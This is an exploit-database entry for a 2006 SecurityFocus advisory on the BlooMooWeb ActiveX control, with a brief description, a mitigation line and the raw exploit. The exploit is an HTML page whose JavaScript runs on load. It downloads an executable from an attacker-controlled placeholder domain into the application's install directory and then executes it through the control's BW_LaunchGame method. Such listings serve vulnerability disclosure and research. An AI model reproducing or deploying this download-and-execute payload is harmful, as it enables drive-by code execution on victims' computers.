header-logo
Suggest Exploit
vendor:
BlooMooWeb ActiveX Control
by:
SecurityFocus
9.3
CVSS
HIGH
Arbitrary File Download, Arbitrary Code Execution, Arbitrary File Deletion
20
CWE
Product Name: BlooMooWeb ActiveX Control
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

BlooMooWeb ActiveX Control Multiple Vulnerabilities

An attacker can exploit these issues to download arbitrary files, execute arbitrary code within the context of the affected application, and delete arbitrary files. The exploit code contains a JavaScript function spawn2() which calls the GetInstallationDir() method of the vulnerable ActiveX control to get the installation directory of the application. It then calls the BW_DownloadFile() method to download a file from a remote attacker-controlled domain and then calls the BW_LaunchGame() method to execute the downloaded file.

Mitigation:

Upgrade to the latest version of BlooMooWeb ActiveX control.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/20827/info

BlooMooWeb ActiveX control is prone to multiple vulnerabilities, including:

- an arbitrary file-download issue
- an arbitrary code-execution issue
- an arbitrary file-deletion issue. 

An attacker can exploit these issues to download arbitrary files, execute arbitrary code within the context of the affected application, and delete arbitrary files.

<html>
<head>
<script language="JavaScript">

var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe";

function spawn2()
{
        aa1=o2obj.GetInstallationDir(null);
        aa2="BlooMooWEB.exe";
        o2obj.BW_DownloadFile(binaryUrl,aa1+aa2,"callback001");
}

function callback001( msgCode, param1, param2, param3 )
{
        if(msgCode == 'DOWNLOAD_COMPLETE' )
        {
                o2obj.BW_LaunchGame("treleferekuku");
        }
}

</script>
</head>

<body onload="spawn2()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
    CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002"
</object>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR